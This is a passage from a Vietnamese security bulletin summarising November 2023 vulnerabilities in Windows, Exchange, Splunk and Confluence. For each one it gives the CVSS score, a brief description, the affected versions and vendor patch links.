Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36036

3.1.3       CVE-2023-36025 Lỗ hổng vượt qua các tính năng bảo mật trong Windows SmartScreen | Windows SmartScreen Security Feature Bypass Vulnerability

CVSS: 8.8/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công vượt qua các tính năng bảo mật trong Windows Windows Defender SmartScreen. Khai thác lỗ hổng yêu cầu lừa người dùng tương tác với tệp tin Internet Shorcut (.URL) hoặc các siêu liên kết trỏ tới tệp tin Shortcut. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.

Phiên bản ảnh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36025

3.1.4       CVE-2023-36397 – Lỗ hổng thực thi mã từ xa | Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

CVSS: 9.8/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực, thực thi mã từ xa trên hệ thống bị ảnh hưởng thông qua việc gửi tệp tin được kiểm soát bởi kẻ tấn công. Khai thác lỗ hổng không yêu cầu tương tác từ người dùng.

Phiên bn nh hưởng:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36397

3.1.5       CVE-2023-36439 –Lỗ hổng thực thi mã từ xa trên Microsoft Exchange | Microsoft Exchange Server Remote Code Execution Vulnerability

CVSS: 8.0/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng với quyền NT AUTHORITY\SYSTEM. Khai thác lỗ hổng yêu cầu xác thực.

Phiên bn nh hưởng:

Microsoft Exchange Server 2019 Cumulative Update 12

Microsoft Exchange Server 2019 Cumulative Update 13

Microsoft Exchange Server 2016 Cumulative Update 23

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36439.

3.2      Ứng Dụng Web Và Các Sản Phẩm Khác

3.2.1       CVE-2023-46214 – Remote code execution (RCE) in Splunk Enterprise

CVSS: 8.0/10

Mô t: Tồn tại lỗ hổng trong Splunk Enterprise do dữ liệu không được xử lý đúng cách. Từ đó kẻ tấn công có thể upload file XSLT độc hại dẫn tới thực thi mã tùy ý trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực.

Hiện tại mã khai thác và bài phân tích đã được công bố trên Internet:

Phiên bn nh hưởng:

Splunk Enterprise các phiên bản dưới 9.0.7 và 9.1.2

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://advisory.splunk.com/advisories/SVD-2023-1104.

3.2.2       CVE-2023- 22518 – Improper Authorization Vulnerability In Confluence Data Center and Server

CVSS: 10/10

Mô t: Tồn tại lỗ hổng cho phép kẻ tấn công không cần xác thực reset Confluence và tạo tài khoản quản trị viên phiên bản Confluence

Phiên bn nh hưởng:

Confluence Data Center và Confluence Server tất cả các phiên bản

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://jira.atlassian.com/browse/CONFSERVER-93142

https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html